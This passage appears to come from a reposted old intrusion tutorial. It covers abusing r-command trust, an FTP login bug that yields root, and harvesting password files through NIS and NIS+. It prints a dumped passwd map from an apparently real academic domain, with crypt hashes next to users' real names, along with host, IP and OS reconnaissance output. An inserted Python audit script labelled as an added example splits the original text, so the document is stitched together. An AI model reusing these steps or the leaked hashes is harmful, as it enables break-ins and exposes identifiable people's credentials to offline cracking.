The trust relationship of the r-commands is built on IP addresses, so trust can be obtained through IP spoofing;
3) rexec
Like telnet, you must also have the user name and password
4) The ancient ftp bug
# ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
(samsa: you are already root)
IV. Breaking and entering
Once you have a (normal user) shell on the target machine, there is a lot more you can do
1) /etc/passwd, /etc/shadow
Read them if you can, take them if you can, crack them if you can
1.1) Directly (no NIS)
$ cat /etc/passwd
......
......
1.2) NIS (yp: yellow pages)
$ domainname
cas.ac.cn
$ ypwhich -d cas.ac.cn
$ ypcat passwd
1.3) NIS+
ox% domainname
ios.ac.cn
ox% nisls
ios.ac.cn:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.cn.:
passwd
group
auto_master
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% niscat passwd.org_dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445::::::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....
(samsa: gotcha!!!)
2) Looking for system vulnerabilities
2.0) Gathering information
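The reason the passwd map above matters is that anyone who can run niscat or ypcat can read it, so every crypt(3) hash in the second field is effectively public. The following audit script is an added example, not part of the original article: it parses a passwd map dump in the Solaris format shown above (the sample lines are constructed from that dump, with the hash values replaced) and reports which accounts expose a hash, which are locked or have no password, and which share uid 0 with root.

```python
# Added example: audit a NIS/NIS+ passwd map dump in the Solaris format
# shown by `niscat passwd.org_dir`.  Field 2 holds the password entry:
# a crypt(3) hash (readable by every user, hence crackable offline),
# "NP" (no password, cannot log in with one), a "*LK*" style lock
# marker, or an empty string (no password needed at all).
from dataclasses import dataclass

# Constructed sample modelled on the dump in the article; hashes are dummies.
SAMPLE_MAP = """\
root:AAbbCCddEEff1:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
guest::14:300:Guest:/hd2/guest:/bin/csh:10658::::::
peif:XyZ12abcDEF34:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
"""

@dataclass
class Finding:
    user: str
    uid: int
    status: str   # exposed-hash | locked | no-password | empty-password

def classify(pw_field):
    """Map the Solaris passwd field to an audit status."""
    if pw_field == "":
        return "empty-password"        # login succeeds with no password
    if pw_field == "NP":
        return "no-password"           # password login disabled
    if pw_field.startswith("*"):
        return "locked"                # *LK* and similar lock markers
    return "exposed-hash"              # crypt(3) hash visible to all users

def audit_passwd_map(text):
    """Parse a passwd map dump; return (findings, extra uid-0 user names)."""
    findings, uid0 = [], []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue                   # skip truncated or "...." lines
        user, pw, uid = fields[0], fields[1], int(fields[2])
        findings.append(Finding(user, uid, classify(pw)))
        if uid == 0 and user != "root":
            uid0.append(user)          # a second root-equivalent account
    return findings, uid0

if __name__ == "__main__":
    found, extra_root = audit_passwd_map(SAMPLE_MAP)
    for f in found:
        print(f"{f.user:10} uid={f.uid:<6} {f.status}")
    print("extra uid 0 accounts:", extra_root)
```

On the article's own dump, the same check would flag root, syscd, peif, lxh, fjh and lhj as exposing hashes and smtp as a second uid 0 account.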
ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox% domainname
ios.ac.cn
ox% ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863 mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0 mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
Article reposted from: http://www.cnpaf.net/Class/hack/05121820345060733893.htm